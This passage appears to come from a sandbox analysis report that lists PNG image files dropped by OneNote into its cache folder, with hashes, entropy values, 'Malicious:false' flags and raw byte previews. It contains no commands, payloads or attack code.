                                                                                                                                            Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002K.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2232
                                                                                                                                            Entropy (8bit):7.837610270261933
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                            MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                            SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                            SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                            SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002L.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13030
                                                                                                                                            Entropy (8bit):7.948664903731204
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                            MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                            SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                            SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                            SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002M.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14458
                                                                                                                                            Entropy (8bit):7.944094738048628
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                            MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                            SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                            SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                            SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002N.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1657
                                                                                                                                            Entropy (8bit):7.80882577056055
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                            MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                            SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                            SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                            SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002O.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4847
                                                                                                                                            Entropy (8bit):7.950192613458318
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                            MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                            SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                            SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                            SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002P.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002Q.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3879
                                                                                                                                            Entropy (8bit):7.9281351307465044
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                            MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                            SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                            SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                            SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002R.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002S.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3679
                                                                                                                                            Entropy (8bit):7.931319059366604
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                            MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                            SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                            SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                            SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002T.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002U.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5386
                                                                                                                                            Entropy (8bit):7.943706538857394
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                            MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                            SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                            SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                            SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002V.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000030.bin

                                                                                                                                            Download File
